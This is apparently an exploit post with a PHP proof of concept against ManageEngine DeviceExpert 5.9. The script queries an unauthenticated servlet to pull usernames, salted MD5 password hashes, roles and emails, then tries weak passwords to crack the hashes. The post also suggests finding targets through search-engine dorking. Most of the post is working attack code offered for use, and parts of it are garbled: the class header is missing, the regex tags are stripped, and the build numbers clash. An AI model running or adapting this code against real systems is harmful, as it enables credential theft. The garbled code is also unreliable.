==================================================================================================================================== | # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://manageengine.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior. [+] LIne 87 set your targer . [+] usage : C:\www\test>php 3.php [+] Payload : host = $host; $this->port = $port; $this->ssl = $ssl; } private function sendRequest($path) { $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } public function getUsers() { echo "Reading users from master...\n"; $response = $this->sendRequest('/ReadUsersFromMasterServlet'); if (!$response) { echo "Connection failed\n"; return null; } if (strpos($response, '') !== false) { preg_match_all('/(.*?)<\/discoverydata>/', $response, $matches); echo "Found " . count($matches[0]) . " users\n"; return $matches[0]; } else { echo "Could not find any users\n"; return null; } } public function parseUserData($user) { if (!$user) return null; preg_match('/([^<]+)<\/username>/', $user, $username); preg_match('/([^<]+)<\/password>/', $user, $encoded_hash); preg_match('/([^<]+)<\/userrole>/', $user, $role); preg_match('/([^<]+)<\/emailid>/', $user, $email); preg_match('/([^<]+)<\/saltvalue>/', $user, $salt); $hash = base64_decode($encoded_hash[1]); $password = null; $weak_passwords = ['12345', 'admin', 'password', $username[1]]; foreach ($weak_passwords as $weak_password) { if (md5($weak_password . $salt[1]) == bin2hex($hash)) { $password = $weak_password; break; } } return [ 'username' => $username[1], 'password' => $password, 'hash' => bin2hex($hash), 'role' => $role[1], 'email' => $email[1], 'salt' => $salt[1] ]; } public function run() { $users = $this->getUsers(); if (!$users) return; foreach ($users as $user) { $user_data = $this->parseUserData($user); if (!$user_data) continue; echo "User: " . $user_data['username'] . "\n"; echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n"; echo "Hash: " . $user_data['hash'] . "\n"; echo "Role: " . $user_data['role'] . "\n"; echo "Email: " . $user_data['email'] . "\n"; echo "Salt: " . $user_data['salt'] . "\n"; echo "----------------------------\n"; } } } // استخدام الكلاس $deviceExpert = new ManageEngineDeviceExpert('127.0.0.1'); $deviceExpert->run(); ?> Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================